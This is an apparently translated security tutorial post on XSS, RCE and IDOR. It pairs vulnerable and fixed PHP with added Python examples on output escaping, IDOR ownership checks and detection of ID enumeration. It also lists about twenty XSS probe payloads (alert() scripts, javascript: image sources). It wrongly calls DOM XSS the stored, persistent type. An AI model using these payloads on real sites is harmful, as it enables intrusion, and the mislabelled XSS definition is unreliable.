TASK 6: XSS, RCE, IDOR
Hello everyone, in this article I will explain some of these vulnerabilities.
XSS (Cross-Site Scripting):
It is the injection of malicious script into places on the site where user-supplied content is rendered, for example:
- iframe tags
- img attributes
- input tags
- link tags
- the background attribute of table tags and td tags
- div tags
- object tags
XSS types:
- DOM XSS
- Stored XSS
- Reflected XSS
How the XSS types differ from each other:
DOM XSS is the most dangerous type: the code you inject is saved in the background, so it runs automatically every time a user visits the page where it was placed. Reflected XSS is different: the injected code is carried in the URL itself, so it only runs when the target opens that same URL.
How to protect against XSS:
We can apply a filtering method against payloads: XSS is prevented by filtering (encoding) the input so that HTML and JavaScript contained in it are shown as text and not executed.
Vulnerable code:
<?php
// The value comes straight from the POST body and is echoed into the page
// without any encoding, so a browser parses it as markup.
$a = $_POST["isim"];
echo $a;
?>
Solution:
<?php
// htmlspecialchars() turns & < > " ' into HTML entities, so the browser
// displays the value as text instead of interpreting it. ENT_QUOTES also
// encodes single quotes, which matters inside single-quoted attributes.
$a = htmlspecialchars($_POST["isim"], ENT_QUOTES, 'UTF-8');
echo $a;
?>
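The vulnerable/fixed pair above is PHP; the following is an added example (not code from the original page or its author) that shows the same fix in Python, using html.escape as the stand-in for htmlspecialchars(), and extends it to two contexts the page's payload list touches: attribute values and the IMG SRC=javascript: payloads, where entity encoding alone is not enough. Function names, the "Merhaba" template and the sample inputs are assumptions made for the example.

```python
import html
from urllib.parse import urlparse

# Constructed sample inputs: two of the payloads listed on this page.
SCRIPT_PAYLOAD = '<script>alert(123);</script>'
URL_PAYLOAD = "jAVasCrIPt:alert('XSS')"


def render_vulnerable(isim: str) -> str:
    """Same defect as the page's vulnerable PHP: the value is pasted into
    the HTML body without encoding, so a browser parses it as markup."""
    return "<p>Merhaba " + isim + "</p>"


def render_fixed(isim: str) -> str:
    """Python equivalent of htmlspecialchars(): & < > " ' become entities,
    so the browser displays the payload as text and never executes it."""
    return "<p>Merhaba " + html.escape(isim, quote=True) + "</p>"


def render_attribute_fixed(isim: str) -> str:
    """Attribute context: the value must sit inside quotes AND the quotes
    in it must be escaped, otherwise a leading quote breaks out of the
    attribute and the rest of the payload becomes markup."""
    return ('<input type="text" name="isim" value="'
            + html.escape(isim, quote=True) + '">')


def safe_href(candidate: str) -> str:
    """URL context: entity encoding leaves the letters and the colon of
    'javascript:' untouched, so it does not neutralise that scheme.
    Allow-list the scheme instead and fall back to an inert value."""
    scheme = urlparse(candidate.strip()).scheme.lower()
    if scheme in ("http", "https"):
        return html.escape(candidate, quote=True)
    return "about:blank"


def has_raw_script(fragment: str) -> bool:
    """Crude check used by the demo: is a literal <script tag or an
    onerror= handler still present in the rendered output?"""
    low = fragment.lower()
    return "<script" in low or "onerror=" in low


if __name__ == "__main__":
    print(render_vulnerable(SCRIPT_PAYLOAD))   # tag survives: executes
    print(render_fixed(SCRIPT_PAYLOAD))        # entities only: displayed as text
    print(safe_href(URL_PAYLOAD))              # about:blank
```

The point of the three render functions is that the encoding has to match the place in the document where the value lands: body text and quoted attributes are covered by entity encoding, but a value that ends up in a URL needs a scheme check, and a value inside an existing <script> block needs yet another treatment that no HTML encoder provides.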
Some payloads:
<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert('XSS')</script>
<script>alert('XSS');</script>
'><script>alert('XSS')</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
'; alert(1);
')alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>
<IMG SRC='javascript:alert('XSS');'>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
Let's exploit with Burp!
RCE (Remote Code Execution):
Although this vulnerability is hard to find, it is very critical: it lets an attacker make the server execute commands as if they were typing at its terminal.
IDOR (Insecure Direct Object Reference):
We can describe it as a vulnerability in which identity is faked through objects: by imitating an object that belongs to another user on the site and carries an ID, an attacker can quickly reach that user's account or account information.
When a user with ID 10 opens their profile and looks at the URL, they see website.com/myprofile?id=10 in the address bar.
If changing the last ID in the URL to 11 gives access to someone else's account, this vulnerability exists.
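The myprofile?id=10 scenario above, as an added example (not code from the original page or its author): a lookup with no ownership check beside one that decides authorization from the server-side session, plus a small detection routine that flags a session requesting many different profile IDs. The in-memory PROFILES table, the log-line format and the function names are assumptions made for the example.

```python
import re
from collections import defaultdict


class Forbidden(Exception):
    """Raised when the session owner may not see the requested object."""


# Constructed sample data: the users 10 and 11 from the text.
PROFILES = {
    10: {"owner_id": 10, "email": "user10@example.com"},
    11: {"owner_id": 11, "email": "user11@example.com"},
}


def get_profile_vulnerable(requested_id: int) -> dict:
    """myprofile?id=<n> with no ownership check: whatever id the client
    sends is served, which is exactly the IDOR the text describes."""
    return PROFILES[requested_id]


def can_access(session_user_id: int, requested_id: int) -> bool:
    """Authorization is decided from the server-side session, not from the
    URL. A missing object and someone else's object get the same answer,
    so the response does not reveal which ids exist."""
    profile = PROFILES.get(requested_id)
    return profile is not None and profile["owner_id"] == session_user_id


def get_profile_fixed(session_user_id: int, requested_id: int) -> dict:
    """The id may still come from the URL, but it is only honoured when the
    logged-in user owns that object."""
    if not can_access(session_user_id, requested_id):
        raise Forbidden("not your profile")
    return PROFILES[requested_id]


def get_own_profile(session_user_id: int) -> dict:
    """Stronger variant for a 'my profile' page: do not take the id from
    the client at all; the session already identifies the user."""
    return PROFILES[session_user_id]


# Constructed access-log lines (assumed format: session id, method, path, status).
LOG_LINES = [
    "sid=s1 GET /myprofile?id=10 200",
    "sid=s1 GET /myprofile?id=10 200",
    "sid=s2 GET /myprofile?id=11 200",
    "sid=s2 GET /myprofile?id=12 200",
    "sid=s2 GET /myprofile?id=13 200",
    "sid=s2 GET /myprofile?id=14 200",
]

LINE_RE = re.compile(r"sid=(\w+) \w+ /myprofile\?id=(\d+)")


def flag_enumeration(lines, threshold=3):
    """Detection side: a legitimate user views their own profile, so a
    session that requests more than `threshold` distinct profile ids is
    walking the id space. Returns the suspicious session ids, sorted."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            seen[m.group(1)].add(int(m.group(2)))
    return sorted(sid for sid, ids in seen.items() if len(ids) > threshold)


if __name__ == "__main__":
    print(get_profile_vulnerable(11))      # served to anyone
    print(can_access(10, 11))              # False
    print(flag_enumeration(LOG_LINES))     # ['s2']
```

Two design points: the fixed lookup compares against the session user, never against anything the client sent, and the "not found" and "not yours" cases return the same result so the ID space cannot be mapped from error differences. The log check is deliberately simple; in practice the threshold would be tuned per endpoint, and sequential ids as in the sample are the clearest signal.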
Source: gorkemozkanat.github.io / infinitumit.com.tr